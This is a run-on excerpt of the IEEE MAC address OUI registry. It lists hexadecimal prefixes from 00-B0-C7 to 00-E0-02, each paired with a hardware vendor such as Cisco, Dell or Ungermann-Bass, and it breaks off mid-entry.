00-B0-C7 (hex) Tellabs Operations, Inc. 00-B0-CE (hex) TECHNOLOGY RESCUE 00-B0-D0 (hex) Dell Computer Corp. 00-B0-DB (hex) Nextcell, Inc. 00-B0-DF (hex) RELDATA Inc 00-B0-E7 (hex) British Federal Ltd. 00-B0-EC (hex) EACEM 00-B0-EE (hex) Ajile Systems, Inc. 00-B0-F0 (hex) CALY NETWORKS 00-B0-F5 (hex) NetWorth Technologies, Inc. 00-B3-38 (hex) Kontron Design Manufacturing Services (M) Sdn. Bhd 00-B3-42 (hex) MacroSAN Technologies Co., Ltd. 00-B5-D6 (hex) Omnibit Inc. 00-B9-F6 (hex) Shenzhen Super Rich Electronics Co.,Ltd 00-BA-C0 (hex) Biometric Access Company 00-BB-01 (hex) OCTOTHORPE CORP. 00-BB-8E (hex) HME Co., Ltd. 00-BB-F0 (hex) UNGERMANN-BASS INC. 00-BD-27 (hex) Exar Corp. 00-BD-3A (hex) Nokia Corporation 00-C0-00 (hex) LANOPTICS, LTD. 00-C0-01 (hex) DIATEK PATIENT MANAGMENT 00-C0-02 (hex) SERCOMM CORPORATION 00-C0-03 (hex) GLOBALNET COMMUNICATIONS 00-C0-04 (hex) JAPAN BUSINESS COMPUTER CO.LTD 00-C0-05 (hex) LIVINGSTON ENTERPRISES, INC. 00-C0-06 (hex) NIPPON AVIONICS CO., LTD. 00-C0-07 (hex) PINNACLE DATA SYSTEMS, INC. 00-C0-08 (hex) SECO SRL 00-C0-09 (hex) KT TECHNOLOGY (S) PTE LTD 00-C0-0A (hex) MICRO CRAFT 00-C0-0B (hex) NORCONTROL A.S. 00-C0-0C (hex) RELIA TECHNOLGIES 00-C0-0D (hex) ADVANCED LOGIC RESEARCH, INC. 00-C0-0E (hex) PSITECH, INC. 00-C0-0F (hex) QUANTUM SOFTWARE SYSTEMS LTD. 00-C0-10 (hex) HIRAKAWA HEWTECH CORP. 00-C0-11 (hex) INTERACTIVE COMPUTING DEVICES 00-C0-12 (hex) NETSPAN CORPORATION 00-C0-13 (hex) NETRIX 00-C0-14 (hex) TELEMATICS CALABASAS INT'L,INC 00-C0-15 (hex) NEW MEDIA CORPORATION 00-C0-16 (hex) ELECTRONIC THEATRE CONTROLS 00-C0-17 (hex) Fluke Corporation 00-C0-18 (hex) LANART CORPORATION 00-C0-19 (hex) LEAP TECHNOLOGY, INC. 00-C0-1A (hex) COROMETRICS MEDICAL SYSTEMS 00-C0-1B (hex) SOCKET COMMUNICATIONS, INC. 00-C0-1C (hex) INTERLINK COMMUNICATIONS LTD. 00-C0-1D (hex) GRAND JUNCTION NETWORKS, INC. 00-C0-1E (hex) LA FRANCAISE DES JEUX 77230 ROUSSY-LE-VIEUX 00-C0-1F (hex) S.E.R.C.E.L. 00-C0-20 (hex) ARCO ELECTRONIC, CONTROL LTD. 00-C0-21 (hex) NETEXPRESS 00-C0-22 (hex) LASERMASTER TECHNOLOGIES, INC. 00-C0-23 (hex) TUTANKHAMON ELECTRONICS 00-C0-24 (hex) EDEN SISTEMAS DE COMPUTACAO SA 00-C0-25 (hex) DATAPRODUCTS CORPORATION 00-C0-26 (hex) LANS TECHNOLOGY CO., LTD. 00-C0-27 (hex) CIPHER SYSTEMS, INC. 00-C0-28 (hex) JASCO CORPORATION 00-C0-29 (hex) Nexans Deutschland GmbH - ANS 00-C0-2A (hex) OHKURA ELECTRIC CO., LTD. 00-C0-2B (hex) GERLOFF GESELLSCHAFT FUR 00-C0-2C (hex) CENTRUM COMMUNICATIONS, INC. 00-C0-2D (hex) FUJI PHOTO FILM CO., LTD. 00-C0-2E (hex) NETWIZ 00-C0-2F (hex) OKUMA CORPORATION 00-C0-30 (hex) INTEGRATED ENGINEERING B. V. 00-C0-31 (hex) DESIGN RESEARCH SYSTEMS, INC. 00-C0-32 (hex) I-CUBED LIMITED 00-C0-33 (hex) TELEBIT COMMUNICATIONS APS 00-C0-34 (hex) TRANSACTION NETWORK 00-C0-35 (hex) QUINTAR COMPANY 00-C0-36 (hex) RAYTECH ELECTRONIC CORP. 00-C0-37 (hex) DYNATEM 00-C0-38 (hex) RASTER IMAGE PROCESSING SYSTEM 00-C0-39 (hex) Teridian Semiconductor Corporation 00-C0-3A (hex) MEN-MIKRO ELEKTRONIK GMBH 00-C0-3B (hex) MULTIACCESS COMPUTING CORP. 00-C0-3C (hex) TOWER TECH S.R.L. 00-C0-3D (hex) WIESEMANN & THEIS GMBH 00-C0-3E (hex) FA. GEBR. HELLER GMBH 00-C0-3F (hex) STORES AUTOMATED SYSTEMS, INC. 00-C0-40 (hex) ECCI 00-C0-41 (hex) DIGITAL TRANSMISSION SYSTEMS 00-C0-42 (hex) DATALUX CORP. 00-C0-43 (hex) STRATACOM 00-C0-44 (hex) EMCOM CORPORATION 00-C0-45 (hex) ISOLATION SYSTEMS, LTD. 00-C0-46 (hex) Blue Chip Technology Ltd 00-C0-47 (hex) UNIMICRO SYSTEMS, INC. 00-C0-48 (hex) BAY TECHNICAL ASSOCIATES 00-C0-49 (hex) U.S. ROBOTICS, INC. 00-C0-4A (hex) GROUP 2000 AG 00-C0-4B (hex) CREATIVE MICROSYSTEMS 00-C0-4C (hex) DEPARTMENT OF FOREIGN AFFAIRS 00-C0-4D (hex) MITEC, INC. 00-C0-4E (hex) COMTROL CORPORATION 00-C0-4F (hex) DELL COMPUTER CORPORATION 00-C0-50 (hex) TOYO DENKI SEIZO K.K. 00-C0-51 (hex) ADVANCED INTEGRATION RESEARCH 00-C0-52 (hex) BURR-BROWN 00-C0-53 (hex) Aspect Software Inc. 00-C0-54 (hex) NETWORK PERIPHERALS, LTD. 00-C0-55 (hex) MODULAR COMPUTING TECHNOLOGIES 00-C0-56 (hex) SOMELEC 00-C0-57 (hex) MYCO ELECTRONICS 00-C0-58 (hex) DATAEXPERT CORP. 00-C0-59 (hex) DENSO CORPORATION 00-C0-5A (hex) SEMAPHORE COMMUNICATIONS CORP. 00-C0-5B (hex) NETWORKS NORTHWEST, INC. 00-C0-5C (hex) ELONEX PLC 00-C0-5D (hex) L&N TECHNOLOGIES 00-C0-5E (hex) VARI-LITE, INC. 00-C0-5F (hex) FINE-PAL COMPANY LIMITED 00-C0-60 (hex) ID SCANDINAVIA AS 00-C0-61 (hex) SOLECTEK CORPORATION 00-C0-62 (hex) IMPULSE TECHNOLOGY 00-C0-63 (hex) MORNING STAR TECHNOLOGIES, INC 00-C0-64 (hex) GENERAL DATACOMM IND. INC. 00-C0-65 (hex) SCOPE COMMUNICATIONS, INC. 00-C0-66 (hex) DOCUPOINT, INC. 00-C0-67 (hex) UNITED BARCODE INDUSTRIES 00-C0-68 (hex) HME Clear-Com LTD. 00-C0-69 (hex) Axxcelera Broadband Wireless 00-C0-6A (hex) ZAHNER-ELEKTRIK GMBH & CO. KG 00-C0-6B (hex) OSI PLUS CORPORATION 00-C0-6C (hex) SVEC COMPUTER CORP. 00-C0-6D (hex) BOCA RESEARCH, INC. 00-C0-6E (hex) HAFT TECHNOLOGY, INC. 00-C0-6F (hex) KOMATSU LTD. 00-C0-70 (hex) SECTRA SECURE-TRANSMISSION AB 00-C0-71 (hex) AREANEX COMMUNICATIONS, INC. 00-C0-72 (hex) KNX LTD. 00-C0-73 (hex) XEDIA CORPORATION 00-C0-74 (hex) TOYODA AUTOMATIC LOOM 00-C0-75 (hex) XANTE CORPORATION 00-C0-76 (hex) I-DATA INTERNATIONAL A-S 00-C0-77 (hex) DAEWOO TELECOM LTD. 00-C0-78 (hex) COMPUTER SYSTEMS ENGINEERING 00-C0-79 (hex) FONSYS CO.,LTD. 00-C0-7A (hex) PRIVA B.V. 00-C0-7B (hex) ASCEND COMMUNICATIONS, INC. 00-C0-7C (hex) HIGHTECH INFORMATION 00-C0-7D (hex) RISC DEVELOPMENTS LTD. 00-C0-7E (hex) KUBOTA CORPORATION ELECTRONIC 00-C0-7F (hex) NUPON COMPUTING CORP. 00-C0-80 (hex) NETSTAR, INC. 00-C0-81 (hex) METRODATA LTD. 00-C0-82 (hex) MOORE PRODUCTS CO. 00-C0-83 (hex) TRACE MOUNTAIN PRODUCTS, INC. 00-C0-84 (hex) DATA LINK CORP. LTD. 00-C0-85 (hex) ELECTRONICS FOR IMAGING, INC. 00-C0-86 (hex) THE LYNK CORPORATION 00-C0-87 (hex) UUNET TECHNOLOGIES, INC. 00-C0-88 (hex) EKF ELEKTRONIK GMBH 00-C0-89 (hex) TELINDUS DISTRIBUTION 00-C0-8A (hex) Lauterbach GmbH 00-C0-8B (hex) RISQ MODULAR SYSTEMS, INC. 00-C0-8C (hex) PERFORMANCE TECHNOLOGIES, INC. 00-C0-8D (hex) TRONIX PRODUCT DEVELOPMENT 00-C0-8E (hex) NETWORK INFORMATION TECHNOLOGY 00-C0-8F (hex) Panasonic Electric Works Co., Ltd. 00-C0-90 (hex) PRAIM S.R.L. 00-C0-91 (hex) JABIL CIRCUIT, INC. 00-C0-92 (hex) MENNEN MEDICAL INC. 00-C0-93 (hex) ALTA RESEARCH CORP. 00-C0-94 (hex) VMX INC. 00-C0-95 (hex) ZNYX 00-C0-96 (hex) TAMURA CORPORATION 00-C0-97 (hex) ARCHIPEL SA F 74940 ANNECY-LE-VIEUX 00-C0-98 (hex) CHUNTEX ELECTRONIC CO., LTD. 00-C0-99 (hex) YOSHIKI INDUSTRIAL CO.,LTD. 00-C0-9A (hex) PHOTONICS CORPORATION 00-C0-9B (hex) RELIANCE COMM/TEC, R-TEC 00-C0-9C (hex) HIOKI E.E. CORPORATION 00-C0-9D (hex) DISTRIBUTED SYSTEMS INT'L, INC 00-C0-9E (hex) CACHE COMPUTERS, INC. 00-C0-9F (hex) QUANTA COMPUTER, INC. 00-C0-A0 (hex) ADVANCE MICRO RESEARCH, INC. 00-C0-A1 (hex) TOKYO DENSHI SEKEI CO. 00-C0-A2 (hex) INTERMEDIUM A/S 00-C0-A3 (hex) DUAL ENTERPRISES CORPORATION 00-C0-A4 (hex) UNIGRAF OY 00-C0-A5 (hex) DICKENS DATA SYSTEMS 00-C0-A6 (hex) EXICOM AUSTRALIA PTY. LTD 00-C0-A7 (hex) SEEL LTD. 00-C0-A8 (hex) GVC CORPORATION 00-C0-A9 (hex) BARRON MCCANN LTD. 00-C0-AA (hex) SILICON VALLEY COMPUTER 00-C0-AB (hex) Telco Systems, Inc. 00-C0-AC (hex) GAMBIT COMPUTER COMMUNICATIONS 00-C0-AD (hex) MARBEN COMMUNICATION SYSTEMS 00-C0-AE (hex) TOWERCOM CO. INC. DBA PC HOUSE 00-C0-AF (hex) TEKLOGIX INC. 00-C0-B0 (hex) GCC TECHNOLOGIES,INC. 00-C0-B1 (hex) GENIUS NET CO. 00-C0-B2 (hex) NORAND CORPORATION 00-C0-B3 (hex) COMSTAT DATACOMM CORPORATION 00-C0-B4 (hex) MYSON TECHNOLOGY, INC. 00-C0-B5 (hex) CORPORATE NETWORK SYSTEMS,INC. 00-C0-B6 (hex) Overland Storage, Inc. 00-C0-B7 (hex) AMERICAN POWER CONVERSION CORP 00-C0-B8 (hex) FRASER'S HILL LTD. 00-C0-B9 (hex) FUNK SOFTWARE, INC. 00-C0-BA (hex) NETVANTAGE 00-C0-BB (hex) FORVAL CREATIVE, INC. 00-C0-BC (hex) TELECOM AUSTRALIA/CSSC 00-C0-BD (hex) INEX TECHNOLOGIES, INC. 00-C0-BE (hex) ALCATEL - SEL 00-C0-BF (hex) TECHNOLOGY CONCEPTS, LTD. 00-C0-C0 (hex) SHORE MICROSYSTEMS, INC. 00-C0-C1 (hex) QUAD/GRAPHICS, INC. 00-C0-C2 (hex) INFINITE NETWORKS LTD. 00-C0-C3 (hex) ACUSON COMPUTED SONOGRAPHY 00-C0-C4 (hex) COMPUTER OPERATIONAL 00-C0-C5 (hex) SID INFORMATICA 00-C0-C6 (hex) PERSONAL MEDIA CORP. 00-C0-C7 (hex) SPARKTRUM MICROSYSTEMS, INC. 00-C0-C8 (hex) MICRO BYTE PTY. LTD. 00-C0-C9 (hex) ELSAG BAILEY PROCESS 00-C0-CA (hex) ALFA, INC. 00-C0-CB (hex) CONTROL TECHNOLOGY CORPORATION 00-C0-CC (hex) TELESCIENCES CO SYSTEMS, INC. 00-C0-CD (hex) COMELTA, S.A. 00-C0-CE (hex) CEI SYSTEMS & ENGINEERING PTE 00-C0-CF (hex) IMATRAN VOIMA OY 00-C0-D0 (hex) RATOC SYSTEM INC. 00-C0-D1 (hex) COMTREE TECHNOLOGY CORPORATION 00-C0-D2 (hex) SYNTELLECT, INC. 00-C0-D3 (hex) OLYMPUS IMAGE SYSTEMS, INC. 00-C0-D4 (hex) AXON NETWORKS, INC. 00-C0-D5 (hex) Werbeagentur Jürgen Siebert 00-C0-D6 (hex) J1 SYSTEMS, INC. 00-C0-D7 (hex) TAIWAN TRADING CENTER DBA 00-C0-D8 (hex) UNIVERSAL DATA SYSTEMS 00-C0-D9 (hex) QUINTE NETWORK CONFIDENTIALITY 00-C0-DA (hex) NICE SYSTEMS LTD. 00-C0-DB (hex) IPC CORPORATION (PTE) LTD. 00-C0-DC (hex) EOS TECHNOLOGIES, INC. 00-C0-DD (hex) QLogic Corporation 00-C0-DE (hex) ZCOMM, INC. 00-C0-DF (hex) KYE Systems Corp. 00-C0-E0 (hex) DSC COMMUNICATION CORP. 00-C0-E1 (hex) SONIC SOLUTIONS 00-C0-E2 (hex) CALCOMP, INC. 00-C0-E3 (hex) OSITECH COMMUNICATIONS, INC. 00-C0-E4 (hex) SIEMENS BUILDING 00-C0-E5 (hex) GESPAC, S.A. 00-C0-E6 (hex) Verilink Corporation 00-C0-E7 (hex) FIBERDATA AB 00-C0-E8 (hex) PLEXCOM, INC. 00-C0-E9 (hex) OAK SOLUTIONS, LTD. 00-C0-EA (hex) ARRAY TECHNOLOGY LTD. 00-C0-EB (hex) SEH COMPUTERTECHNIK GMBH 00-C0-EC (hex) DAUPHIN TECHNOLOGY 00-C0-ED (hex) US ARMY ELECTRONIC 00-C0-EE (hex) KYOCERA CORPORATION 00-C0-EF (hex) ABIT CORPORATION 00-C0-F0 (hex) KINGSTON TECHNOLOGY CORP. 00-C0-F1 (hex) SHINKO ELECTRIC CO., LTD. 00-C0-F2 (hex) TRANSITION NETWORKS 00-C0-F3 (hex) NETWORK COMMUNICATIONS CORP. 00-C0-F4 (hex) INTERLINK SYSTEM CO., LTD. 00-C0-F5 (hex) METACOMP, INC. 00-C0-F6 (hex) CELAN TECHNOLOGY INC. 00-C0-F7 (hex) ENGAGE COMMUNICATION, INC. 00-C0-F8 (hex) ABOUT COMPUTING INC. 00-C0-F9 (hex) Emerson Network Power 00-C0-FA (hex) CANARY COMMUNICATIONS, INC. 00-C0-FB (hex) ADVANCED TECHNOLOGY LABS 00-C0-FC (hex) ELASTIC REALITY, INC. 00-C0-FD (hex) PROSUM 00-C0-FE (hex) APTEC COMPUTER SYSTEMS, INC. 00-C0-FF (hex) DOT HILL SYSTEMS CORPORATION 00-C6-10 (hex) Apple, Inc. 00-CB-BD (hex) Cambridge Broadband Networks Ltd. 00-CD-90 (hex) MAS Elektronik AG 00-CF-1C (hex) COMMUNICATION MACHINERY CORP. 00-D0-00 (hex) FERRAN SCIENTIFIC, INC. 00-D0-01 (hex) VST TECHNOLOGIES, INC. 00-D0-02 (hex) DITECH CORPORATION 00-D0-03 (hex) COMDA ENTERPRISES CORP. 00-D0-04 (hex) PENTACOM LTD. 00-D0-05 (hex) ZHS ZEITMANAGEMENTSYSTEME 00-D0-06 (hex) CISCO SYSTEMS, INC. 00-D0-07 (hex) MIC ASSOCIATES, INC. 00-D0-08 (hex) MACTELL CORPORATION 00-D0-09 (hex) HSING TECH. ENTERPRISE CO. LTD 00-D0-0A (hex) LANACCESS TELECOM S.A. 00-D0-0B (hex) RHK TECHNOLOGY, INC. 00-D0-0C (hex) SNIJDER MICRO SYSTEMS 00-D0-0D (hex) MICROMERITICS INSTRUMENT 00-D0-0E (hex) PLURIS, INC. 00-D0-0F (hex) SPEECH DESIGN GMBH 00-D0-10 (hex) CONVERGENT NETWORKS, INC. 00-D0-11 (hex) PRISM VIDEO, INC. 00-D0-12 (hex) GATEWORKS CORP. 00-D0-13 (hex) PRIMEX AEROSPACE COMPANY 00-D0-14 (hex) ROOT, INC. 00-D0-15 (hex) UNIVEX MICROTECHNOLOGY CORP. 00-D0-16 (hex) SCM MICROSYSTEMS, INC. 00-D0-17 (hex) SYNTECH INFORMATION CO., LTD. 00-D0-18 (hex) QWES. COM, INC. 00-D0-19 (hex) DAINIPPON SCREEN CORPORATE 00-D0-1A (hex) URMET TLC S.P.A. 00-D0-1B (hex) MIMAKI ENGINEERING CO., LTD. 00-D0-1C (hex) SBS TECHNOLOGIES, 00-D0-1D (hex) FURUNO ELECTRIC CO., LTD. 00-D0-1E (hex) PINGTEL CORP. 00-D0-1F (hex) CTAM PTY. LTD. 00-D0-20 (hex) AIM SYSTEM, INC. 00-D0-21 (hex) REGENT ELECTRONICS CORP. 00-D0-22 (hex) INCREDIBLE TECHNOLOGIES, INC. 00-D0-23 (hex) INFORTREND TECHNOLOGY, INC. 00-D0-24 (hex) Cognex Corporation 00-D0-25 (hex) XROSSTECH, INC. 00-D0-26 (hex) HIRSCHMANN AUSTRIA GMBH 00-D0-27 (hex) APPLIED AUTOMATION, INC. 00-D0-28 (hex) OMNEON VIDEO NETWORKS 00-D0-29 (hex) WAKEFERN FOOD CORPORATION 00-D0-2A (hex) Voxent Systems Ltd. 00-D0-2B (hex) JETCELL, INC. 00-D0-2C (hex) CAMPBELL SCIENTIFIC, INC. 00-D0-2D (hex) ADEMCO 00-D0-2E (hex) COMMUNICATION AUTOMATION CORP. 00-D0-2F (hex) VLSI TECHNOLOGY INC. 00-D0-30 (hex) Safetran Systems Corp 00-D0-31 (hex) INDUSTRIAL LOGIC CORPORATION 00-D0-32 (hex) YANO ELECTRIC CO., LTD. 00-D0-33 (hex) DALIAN DAXIAN NETWORK 00-D0-34 (hex) ORMEC SYSTEMS CORP. 00-D0-35 (hex) BEHAVIOR TECH. COMPUTER CORP. 00-D0-36 (hex) TECHNOLOGY ATLANTA CORP. 00-D0-37 (hex) Pace France 00-D0-38 (hex) FIVEMERE, LTD. 00-D0-39 (hex) UTILICOM, INC. 00-D0-3A (hex) ZONEWORX, INC. 00-D0-3B (hex) VISION PRODUCTS PTY. LTD. 00-D0-3C (hex) Vieo, Inc. 00-D0-3D (hex) GALILEO TECHNOLOGY, LTD. 00-D0-3E (hex) ROCKETCHIPS, INC. 00-D0-3F (hex) AMERICAN COMMUNICATION 00-D0-40 (hex) SYSMATE CO., LTD. 00-D0-41 (hex) AMIGO TECHNOLOGY CO., LTD. 00-D0-42 (hex) MAHLO GMBH & CO. UG 00-D0-43 (hex) ZONAL RETAIL DATA SYSTEMS 00-D0-44 (hex) ALIDIAN NETWORKS, INC. 00-D0-45 (hex) KVASER AB 00-D0-46 (hex) DOLBY LABORATORIES, INC. 00-D0-47 (hex) XN TECHNOLOGIES 00-D0-48 (hex) ECTON, INC. 00-D0-49 (hex) IMPRESSTEK CO., LTD. 00-D0-4A (hex) PRESENCE TECHNOLOGY GMBH 00-D0-4B (hex) LA CIE GROUP S.A. 00-D0-4C (hex) EUROTEL TELECOM LTD. 00-D0-4D (hex) DIV OF RESEARCH & STATISTICS 00-D0-4E (hex) LOGIBAG 00-D0-4F (hex) BITRONICS, INC. 00-D0-50 (hex) ISKRATEL 00-D0-51 (hex) O2 MICRO, INC. 00-D0-52 (hex) ASCEND COMMUNICATIONS, INC. 00-D0-53 (hex) CONNECTED SYSTEMS 00-D0-54 (hex) SAS INSTITUTE INC. 00-D0-55 (hex) KATHREIN-WERKE KG 00-D0-56 (hex) SOMAT CORPORATION 00-D0-57 (hex) ULTRAK, INC. 00-D0-58 (hex) CISCO SYSTEMS, INC. 00-D0-59 (hex) AMBIT MICROSYSTEMS CORP. 00-D0-5A (hex) SYMBIONICS, LTD. 00-D0-5B (hex) ACROLOOP MOTION CONTROL 00-D0-5C (hex) TECHNOTREND SYSTEMTECHNIK GMBH 00-D0-5D (hex) INTELLIWORXX, INC. 00-D0-5E (hex) STRATABEAM TECHNOLOGY, INC. 00-D0-5F (hex) VALCOM, INC. 00-D0-60 (hex) Panasonic Europe Ltd. 00-D0-61 (hex) TREMON ENTERPRISES CO., LTD. 00-D0-62 (hex) DIGIGRAM 00-D0-63 (hex) CISCO SYSTEMS, INC. 00-D0-64 (hex) MULTITEL 00-D0-65 (hex) TOKO ELECTRIC 00-D0-66 (hex) WINTRISS ENGINEERING CORP. 00-D0-67 (hex) CAMPIO COMMUNICATIONS 00-D0-68 (hex) IWILL CORPORATION 00-D0-69 (hex) TECHNOLOGIC SYSTEMS 00-D0-6A (hex) LINKUP SYSTEMS CORPORATION 00-D0-6B (hex) SR TELECOM INC. 00-D0-6C (hex) SHAREWAVE, INC. 00-D0-6D (hex) ACRISON, INC. 00-D0-6E (hex) TRENDVIEW RECORDERS LTD. 00-D0-6F (hex) KMC CONTROLS 00-D0-70 (hex) LONG WELL ELECTRONICS CORP. 00-D0-71 (hex) ECHELON CORP. 00-D0-72 (hex) BROADLOGIC 00-D0-73 (hex) ACN ADVANCED COMMUNICATIONS 00-D0-74 (hex) TAQUA SYSTEMS, INC. 00-D0-75 (hex) ALARIS MEDICAL SYSTEMS, INC. 00-D0-76 (hex) Bank of America 00-D0-77 (hex) LUCENT TECHNOLOGIES 00-D0-78 (hex) Eltex of Sweden AB 00-D0-79 (hex) CISCO SYSTEMS, INC. 00-D0-7A (hex) AMAQUEST COMPUTER CORP. 00-D0-7B (hex) COMCAM INTERNATIONAL INC 00-D0-7C (hex) KOYO ELECTRONICS INC. CO.,LTD. 00-D0-7D (hex) COSINE COMMUNICATIONS 00-D0-7E (hex) KEYCORP LTD. 00-D0-7F (hex) STRATEGY & TECHNOLOGY, LIMITED 00-D0-80 (hex) EXABYTE CORPORATION 00-D0-81 (hex) RTD Embedded Technologies, Inc. 00-D0-82 (hex) IOWAVE INC. 00-D0-83 (hex) INVERTEX, INC. 00-D0-84 (hex) NEXCOMM SYSTEMS, INC. 00-D0-85 (hex) OTIS ELEVATOR COMPANY 00-D0-86 (hex) FOVEON, INC. 00-D0-87 (hex) MICROFIRST INC. 00-D0-88 (hex) Motorola, Inc. 00-D0-89 (hex) DYNACOLOR, INC. 00-D0-8A (hex) PHOTRON USA 00-D0-8B (hex) ADVA Optical Networking Ltd 00-D0-8C (hex) GENOA TECHNOLOGY, INC. 00-D0-8D (hex) PHOENIX GROUP, INC. 00-D0-8E (hex) NVISION INC. 00-D0-8F (hex) ARDENT TECHNOLOGIES, INC. 00-D0-90 (hex) CISCO SYSTEMS, INC. 00-D0-91 (hex) SMARTSAN SYSTEMS, INC. 00-D0-92 (hex) GLENAYRE WESTERN MULTIPLEX 00-D0-93 (hex) TQ - COMPONENTS GMBH 00-D0-94 (hex) TIMELINE VISTA, INC. 00-D0-95 (hex) Alcatel-Lucent, Enterprise Business Group 00-D0-96 (hex) 3COM EUROPE LTD. 00-D0-97 (hex) CISCO SYSTEMS, INC. 00-D0-98 (hex) Photon Dynamics Canada Inc. 00-D0-99 (hex) ELCARD OY 00-D0-9A (hex) FILANET CORPORATION 00-D0-9B (hex) SPECTEL LTD. 00-D0-9C (hex) KAPADIA COMMUNICATIONS 00-D0-9D (hex) VERIS INDUSTRIES 00-D0-9E (hex) 2WIRE, INC. 00-D0-9F (hex) NOVTEK TEST SYSTEMS 00-D0-A0 (hex) MIPS DENMARK 00-D0-A1 (hex) OSKAR VIERLING GMBH + CO. KG 00-D0-A2 (hex) INTEGRATED DEVICE 00-D0-A3 (hex) VOCAL DATA, INC. 00-D0-A4 (hex) ALANTRO COMMUNICATIONS 00-D0-A5 (hex) AMERICAN ARIUM 00-D0-A6 (hex) LANBIRD TECHNOLOGY CO., LTD. 00-D0-A7 (hex) TOKYO SOKKI KENKYUJO CO., LTD. 00-D0-A8 (hex) NETWORK ENGINES, INC. 00-D0-A9 (hex) SHINANO KENSHI CO., LTD. 00-D0-AA (hex) CHASE COMMUNICATIONS 00-D0-AB (hex) DELTAKABEL TELECOM CV 00-D0-AC (hex) GRAYSON WIRELESS 00-D0-AD (hex) TL INDUSTRIES 00-D0-AE (hex) ORESIS COMMUNICATIONS, INC. 00-D0-AF (hex) CUTLER-HAMMER, INC. 00-D0-B0 (hex) BITSWITCH LTD. 00-D0-B1 (hex) OMEGA ELECTRONICS SA 00-D0-B2 (hex) XIOTECH CORPORATION 00-D0-B3 (hex) DRS FLIGHT SAFETY AND 00-D0-B4 (hex) KATSUJIMA CO., LTD. 00-D0-B5 (hex) IPricot formerly DotCom 00-D0-B6 (hex) CRESCENT NETWORKS, INC. 00-D0-B7 (hex) INTEL CORPORATION 00-D0-B8 (hex) Iomega Corporation 00-D0-B9 (hex) MICROTEK INTERNATIONAL, INC. 00-D0-BA (hex) CISCO SYSTEMS, INC. 00-D0-BB (hex) CISCO SYSTEMS, INC. 00-D0-BC (hex) CISCO SYSTEMS, INC. 00-D0-BD (hex) Silicon Image GmbH 00-D0-BE (hex) EMUTEC INC. 00-D0-BF (hex) PIVOTAL TECHNOLOGIES 00-D0-C0 (hex) CISCO SYSTEMS, INC. 00-D0-C1 (hex) HARMONIC DATA SYSTEMS, LTD. 00-D0-C2 (hex) BALTHAZAR TECHNOLOGY AB 00-D0-C3 (hex) VIVID TECHNOLOGY PTE, LTD. 00-D0-C4 (hex) TERATECH CORPORATION 00-D0-C5 (hex) COMPUTATIONAL SYSTEMS, INC. 00-D0-C6 (hex) THOMAS & BETTS CORP. 00-D0-C7 (hex) PATHWAY, INC. 00-D0-C8 (hex) Prevas A/S 00-D0-C9 (hex) ADVANTECH CO., LTD. 00-D0-CA (hex) Intrinsyc Software International Inc. 00-D0-CB (hex) DASAN CO., LTD. 00-D0-CC (hex) TECHNOLOGIES LYRE INC. 00-D0-CD (hex) ATAN TECHNOLOGY INC. 00-D0-CE (hex) ASYST ELECTRONIC 00-D0-CF (hex) MORETON BAY 00-D0-D0 (hex) ZHONGXING TELECOM LTD. 00-D0-D1 (hex) Sycamore Networks 00-D0-D2 (hex) EPILOG CORPORATION 00-D0-D3 (hex) CISCO SYSTEMS, INC. 00-D0-D4 (hex) V-BITS, INC. 00-D0-D5 (hex) GRUNDIG AG 00-D0-D6 (hex) AETHRA TELECOMUNICAZIONI 00-D0-D7 (hex) B2C2, INC. 00-D0-D8 (hex) 3Com Corporation 00-D0-D9 (hex) DEDICATED MICROCOMPUTERS 00-D0-DA (hex) TAICOM DATA SYSTEMS CO., LTD. 00-D0-DB (hex) MCQUAY INTERNATIONAL 00-D0-DC (hex) MODULAR MINING SYSTEMS, INC. 00-D0-DD (hex) SUNRISE TELECOM, INC. 00-D0-DE (hex) PHILIPS MULTIMEDIA NETWORK 00-D0-DF (hex) KUZUMI ELECTRONICS, INC. 00-D0-E0 (hex) DOOIN ELECTRONICS CO. 00-D0-E1 (hex) AVIONITEK ISRAEL INC. 00-D0-E2 (hex) MRT MICRO, INC. 00-D0-E3 (hex) ELE-CHEM ENGINEERING CO., LTD. 00-D0-E4 (hex) CISCO SYSTEMS, INC. 00-D0-E5 (hex) SOLIDUM SYSTEMS CORP. 00-D0-E6 (hex) IBOND INC. 00-D0-E7 (hex) VCON TELECOMMUNICATION LTD. 00-D0-E8 (hex) MAC SYSTEM CO., LTD. 00-D0-E9 (hex) Advantage Century Telecommunication Corp. 00-D0-EA (hex) NEXTONE COMMUNICATIONS, INC. 00-D0-EB (hex) LIGHTERA NETWORKS, INC. 00-D0-EC (hex) NAKAYO TELECOMMUNICATIONS, INC 00-D0-ED (hex) XIOX 00-D0-EE (hex) DICTAPHONE CORPORATION 00-D0-EF (hex) IGT 00-D0-F0 (hex) CONVISION TECHNOLOGY GMBH 00-D0-F1 (hex) SEGA ENTERPRISES, LTD. 00-D0-F2 (hex) MONTEREY NETWORKS 00-D0-F3 (hex) SOLARI DI UDINE SPA 00-D0-F4 (hex) CARINTHIAN TECH INSTITUTE 00-D0-F5 (hex) ORANGE MICRO, INC. 00-D0-F6 (hex) Alcatel Canada 00-D0-F7 (hex) NEXT NETS CORPORATION 00-D0-F8 (hex) FUJIAN STAR TERMINAL 00-D0-F9 (hex) ACUTE COMMUNICATIONS CORP. 00-D0-FA (hex) Thales e-Security Ltd. 00-D0-FB (hex) TEK MICROSYSTEMS, INCORPORATED 00-D0-FC (hex) GRANITE MICROSYSTEMS 00-D0-FD (hex) OPTIMA TELE.COM, INC. 00-D0-FE (hex) ASTRAL POINT 00-D0-FF (hex) CISCO SYSTEMS, INC. 00-D1-1C (hex) ACETEL 00-D3-8D (hex) Hotel Technology Next Generation 00-D6-32 (hex) GE Energy 00-DB-45 (hex) THAMWAY CO.,LTD. 00-DB-DF (hex) Intel Corporate 00-DD-00 (hex) UNGERMANN-BASS INC. 00-DD-01 (hex) UNGERMANN-BASS INC. 00-DD-02 (hex) UNGERMANN-BASS INC. 00-DD-03 (hex) UNGERMANN-BASS INC. 00-DD-04 (hex) UNGERMANN-BASS INC. 00-DD-05 (hex) UNGERMANN-BASS INC. 00-DD-06 (hex) UNGERMANN-BASS INC. 00-DD-07 (hex) UNGERMANN-BASS INC. 00-DD-08 (hex) UNGERMANN-BASS INC. 00-DD-09 (hex) UNGERMANN-BASS INC. 00-DD-0A (hex) UNGERMANN-BASS INC. 00-DD-0B (hex) UNGERMANN-BASS INC. 00-DD-0C (hex) UNGERMANN-BASS INC. 00-DD-0D (hex) UNGERMANN-BASS INC. 00-DD-0E (hex) UNGERMANN-BASS INC. 00-DD-0F (hex) UNGERMANN-BASS INC. 00-E0-00 (hex) Fujitsu Limited 00-E0-01 (hex) STRAND LIGHTING LIMITED 00-E0-02 